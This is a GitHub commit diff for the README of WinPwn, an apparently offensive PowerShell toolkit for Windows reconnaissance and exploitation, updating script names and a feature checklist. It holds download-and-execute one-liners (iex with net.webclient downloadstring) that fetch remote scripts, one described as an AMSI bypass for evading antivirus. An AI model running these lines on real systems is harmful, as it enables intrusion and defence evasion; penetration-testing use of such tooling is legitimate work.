Skip to content

Commit 779866b

Browse files
Update README.md
1 parent e6bdb35 commit 779866b

File tree

1 file changed

+3
-3
lines changed

1 file changed

+3
-3
lines changed

README.md

Lines changed: 3 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -7,8 +7,8 @@ Yes it is not a C# and it may be flagged by antivirus solutions. Windows Defende
77
Any suggestions, feedback and comments are welcome!
88

99
Just Import the Modules with:
10-
`Import-Module .\WinPwn_v0.7.ps1` or
11-
`iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/WinPwn/master/WinPwn_v0.7.ps1')`
10+
`Import-Module .\WinPwn.ps1` or
11+
`iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/WinPwn/master/WinPwn.ps1')`
1212

1313
For AMSI Bypass use the following oneliner:
1414
`iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/WinPwn/master/ObfusWinPwn.ps1')`
@@ -60,7 +60,7 @@ The submodule is a forked and edited version of https://github.com/Cn33liz/p0wne
6060
- [ ] More Recon/Exploitation functions
6161
- [ ] msDS-AllowedToActOnBehalfOfOtherIdentity Ressource based constrained delegation
6262
- [x] Add MS17-10 Scanner
63-
- [ ] Add menu for better handling of functions
63+
- [x] Add menu for better handling of functions
6464
- [x] Amsi Bypass
6565

6666
![alt text](https://raw.githubusercontent.com/SecureThisShit/WinPwn/master/Pwn.png)

0 commit comments

Comments
 (0)